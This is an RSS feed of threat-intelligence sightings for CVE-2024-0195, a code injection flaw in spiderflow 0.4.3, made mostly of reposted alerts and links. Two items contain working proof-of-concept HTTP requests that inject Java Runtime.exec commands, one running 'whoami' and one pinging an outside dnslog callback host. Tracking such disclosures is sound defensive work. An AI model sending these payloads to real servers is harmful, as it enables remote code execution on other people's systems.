<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent sightings.</title>
    <link>https://vulnerability.circl.lu</link>
    <description>Contains only the most 10 recent sightings.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Wed, 06 May 2026 11:58:30 +0000</lastBuildDate>
    <item>
      <title>9769123e-728e-401d-ad11-b92befff5b6e</title>
      <link>https://vulnerability.circl.lu/sighting/9769123e-728e-401d-ad11-b92befff5b6e/export</link>
      <description>{"uuid": "9769123e-728e-401d-ad11-b92befff5b6e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-0195", "type": "seen", "source": "https://t.me/ctinow/162056", "content": "https://ift.tt/xaj4rfN\nCVE-2024-0195", "creation_timestamp": "2024-01-02T22:26:52.000000Z"}</description>
      <content:encoded>{"uuid": "9769123e-728e-401d-ad11-b92befff5b6e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-0195", "type": "seen", "source": "https://t.me/ctinow/162056", "content": "https://ift.tt/xaj4rfN\nCVE-2024-0195", "creation_timestamp": "2024-01-02T22:26:52.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/9769123e-728e-401d-ad11-b92befff5b6e/export</guid>
      <pubDate>Tue, 02 Jan 2024 22:26:52 +0000</pubDate>
    </item>
    <item>
      <title>646058b4-6247-4783-b42a-7171abd5c3ca</title>
      <link>https://vulnerability.circl.lu/sighting/646058b4-6247-4783-b42a-7171abd5c3ca/export</link>
      <description>{"uuid": "646058b4-6247-4783-b42a-7171abd5c3ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-0195", "type": "seen", "source": "https://t.me/cibsecurity/74202", "content": "\u203c\ufe0fCVE-2024-0195\u203c\ufe0f\n\nA vulnerability, which was classified as critical, was found in spiderflow 0.4.3. Affected is the function FunctionService.saveFunction of the file srcmainjavaorgspiderflowcontrollerFunctionController.java. The manipulation leads to code injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB249510 is the identifier assigned to this vulnerability.\n\n\ud83d\udcd6 Read more\n\nVia \"National Vulnerability Database\"", "creation_timestamp": "2024-01-03T01:37:23.000000Z"}</description>
      <content:encoded>{"uuid": "646058b4-6247-4783-b42a-7171abd5c3ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-0195", "type": "seen", "source": "https://t.me/cibsecurity/74202", "content": "\u203c\ufe0fCVE-2024-0195\u203c\ufe0f\n\nA vulnerability, which was classified as critical, was found in spiderflow 0.4.3. Affected is the function FunctionService.saveFunction of the file srcmainjavaorgspiderflowcontrollerFunctionController.java. The manipulation leads to code injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB249510 is the identifier assigned to this vulnerability.\n\n\ud83d\udcd6 Read more\n\nVia \"National Vulnerability Database\"", "creation_timestamp": "2024-01-03T01:37:23.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/646058b4-6247-4783-b42a-7171abd5c3ca/export</guid>
      <pubDate>Wed, 03 Jan 2024 01:37:23 +0000</pubDate>
    </item>
    <item>
      <title>4fbd4f5e-c17e-4f50-b846-5eecff1ac145</title>
      <link>https://vulnerability.circl.lu/sighting/4fbd4f5e-c17e-4f50-b846-5eecff1ac145/export</link>
      <description>{"uuid": "4fbd4f5e-c17e-4f50-b846-5eecff1ac145", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-0195", "type": "seen", "source": "https://t.me/ctinow/164842", "content": "https://ift.tt/zunW3Vx\nCVE-2024-0195 Exploit", "creation_timestamp": "2024-01-09T08:16:07.000000Z"}</description>
      <content:encoded>{"uuid": "4fbd4f5e-c17e-4f50-b846-5eecff1ac145", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-0195", "type": "seen", "source": "https://t.me/ctinow/164842", "content": "https://ift.tt/zunW3Vx\nCVE-2024-0195 Exploit", "creation_timestamp": "2024-01-09T08:16:07.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/4fbd4f5e-c17e-4f50-b846-5eecff1ac145/export</guid>
      <pubDate>Tue, 09 Jan 2024 08:16:07 +0000</pubDate>
    </item>
    <item>
      <title>78c1275f-80da-4411-8ba9-2e55df0c87c4</title>
      <link>https://vulnerability.circl.lu/sighting/78c1275f-80da-4411-8ba9-2e55df0c87c4/export</link>
      <description>{"uuid": "78c1275f-80da-4411-8ba9-2e55df0c87c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-0195", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/1821", "content": "cve-2024-0195\n\nPOST /function/save HTTP/1.1\nHost: your-ip\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nAccept: */*\nAccept-Encoding: gzip, deflate\nX-Requested-With: XMLHttpRequest\n\nid=1&amp;amp;name=cmd&amp;amp;parameter=rce&amp;amp;script=%7DJava.type('java.lang.Runtime').getRuntime().exec('whoami')%3B%7B\n\n#poc  #exploit", "creation_timestamp": "2024-01-10T09:39:51.000000Z"}</description>
      <content:encoded>{"uuid": "78c1275f-80da-4411-8ba9-2e55df0c87c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-0195", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/1821", "content": "cve-2024-0195\n\nPOST /function/save HTTP/1.1\nHost: your-ip\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nAccept: */*\nAccept-Encoding: gzip, deflate\nX-Requested-With: XMLHttpRequest\n\nid=1&amp;amp;name=cmd&amp;amp;parameter=rce&amp;amp;script=%7DJava.type('java.lang.Runtime').getRuntime().exec('whoami')%3B%7B\n\n#poc  #exploit", "creation_timestamp": "2024-01-10T09:39:51.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/78c1275f-80da-4411-8ba9-2e55df0c87c4/export</guid>
      <pubDate>Wed, 10 Jan 2024 09:39:51 +0000</pubDate>
    </item>
    <item>
      <title>8c67e884-66ad-4fa7-9610-3c5ae3002a77</title>
      <link>https://vulnerability.circl.lu/sighting/8c67e884-66ad-4fa7-9610-3c5ae3002a77/export</link>
      <description>{"uuid": "8c67e884-66ad-4fa7-9610-3c5ae3002a77", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-0195", "type": "seen", "source": "https://t.me/ctinow/171359", "content": "https://ift.tt/Y1p6zLw\nCVE-2024-0195 | spider-flow 0.4.3 FunctionController.java FunctionService.saveFunction code injection", "creation_timestamp": "2024-01-22T19:11:04.000000Z"}</description>
      <content:encoded>{"uuid": "8c67e884-66ad-4fa7-9610-3c5ae3002a77", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-0195", "type": "seen", "source": "https://t.me/ctinow/171359", "content": "https://ift.tt/Y1p6zLw\nCVE-2024-0195 | spider-flow 0.4.3 FunctionController.java FunctionService.saveFunction code injection", "creation_timestamp": "2024-01-22T19:11:04.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/8c67e884-66ad-4fa7-9610-3c5ae3002a77/export</guid>
      <pubDate>Mon, 22 Jan 2024 19:11:04 +0000</pubDate>
    </item>
    <item>
      <title>3edf5a23-0af6-482e-808d-b0154076fa9a</title>
      <link>https://vulnerability.circl.lu/sighting/3edf5a23-0af6-482e-808d-b0154076fa9a/export</link>
      <description>{"uuid": "3edf5a23-0af6-482e-808d-b0154076fa9a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-0195", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8423", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-0195 Improper Control of Generation of Code ('Code Injection')\nURL\uff1ahttps://github.com/fa-rrel/CVE-2024-0195-SpiderFlow\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-08-31T07:39:53.000000Z"}</description>
      <content:encoded>{"uuid": "3edf5a23-0af6-482e-808d-b0154076fa9a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-0195", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8423", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-0195 Improper Control of Generation of Code ('Code Injection')\nURL\uff1ahttps://github.com/fa-rrel/CVE-2024-0195-SpiderFlow\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-08-31T07:39:53.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/3edf5a23-0af6-482e-808d-b0154076fa9a/export</guid>
      <pubDate>Sat, 31 Aug 2024 07:39:53 +0000</pubDate>
    </item>
    <item>
      <title>cbec503e-01b9-4ea0-8978-3a3d0d6980d9</title>
      <link>https://vulnerability.circl.lu/sighting/cbec503e-01b9-4ea0-8978-3a3d0d6980d9/export</link>
      <description>{"uuid": "cbec503e-01b9-4ea0-8978-3a3d0d6980d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-0195", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/3091", "content": "#exploit #poc", "creation_timestamp": "2024-08-31T11:11:03.000000Z"}</description>
      <content:encoded>{"uuid": "cbec503e-01b9-4ea0-8978-3a3d0d6980d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-0195", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/3091", "content": "#exploit #poc", "creation_timestamp": "2024-08-31T11:11:03.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/cbec503e-01b9-4ea0-8978-3a3d0d6980d9/export</guid>
      <pubDate>Sat, 31 Aug 2024 11:11:03 +0000</pubDate>
    </item>
    <item>
      <title>898e3f8d-f43d-4d2c-b84a-5c1a55d69d8a</title>
      <link>https://vulnerability.circl.lu/sighting/898e3f8d-f43d-4d2c-b84a-5c1a55d69d8a/export</link>
      <description>{"uuid": "898e3f8d-f43d-4d2c-b84a-5c1a55d69d8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-0195", "type": "published-proof-of-concept", "source": "https://t.me/HackerArsenal/240", "content": "#exploit #poc", "creation_timestamp": "2024-08-31T14:58:47.000000Z"}</description>
      <content:encoded>{"uuid": "898e3f8d-f43d-4d2c-b84a-5c1a55d69d8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-0195", "type": "published-proof-of-concept", "source": "https://t.me/HackerArsenal/240", "content": "#exploit #poc", "creation_timestamp": "2024-08-31T14:58:47.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/898e3f8d-f43d-4d2c-b84a-5c1a55d69d8a/export</guid>
      <pubDate>Sat, 31 Aug 2024 14:58:47 +0000</pubDate>
    </item>
    <item>
      <title>da56b5b1-121d-4032-8abf-60f00775658e</title>
      <link>https://vulnerability.circl.lu/sighting/da56b5b1-121d-4032-8abf-60f00775658e/export</link>
      <description>{"uuid": "da56b5b1-121d-4032-8abf-60f00775658e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-0195", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/1887", "content": "CVE-2024-0195 Exploit\n\nPOST /function/save HTTP/1.1\nHost: 192.168.116.128:8080\nX-Requested-With: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nContent-Length: 139\n\nid=&amp;amp;name=test&amp;amp;parameter=test&amp;amp;script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+18k2tu.dnslog.cn')%3B%7B\n\n#exploit #poc", "creation_timestamp": "2024-09-01T16:43:36.000000Z"}</description>
      <content:encoded>{"uuid": "da56b5b1-121d-4032-8abf-60f00775658e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-0195", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/1887", "content": "CVE-2024-0195 Exploit\n\nPOST /function/save HTTP/1.1\nHost: 192.168.116.128:8080\nX-Requested-With: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nContent-Length: 139\n\nid=&amp;amp;name=test&amp;amp;parameter=test&amp;amp;script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+18k2tu.dnslog.cn')%3B%7B\n\n#exploit #poc", "creation_timestamp": "2024-09-01T16:43:36.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/da56b5b1-121d-4032-8abf-60f00775658e/export</guid>
      <pubDate>Sun, 01 Sep 2024 16:43:36 +0000</pubDate>
    </item>
  </channel>
</rss>
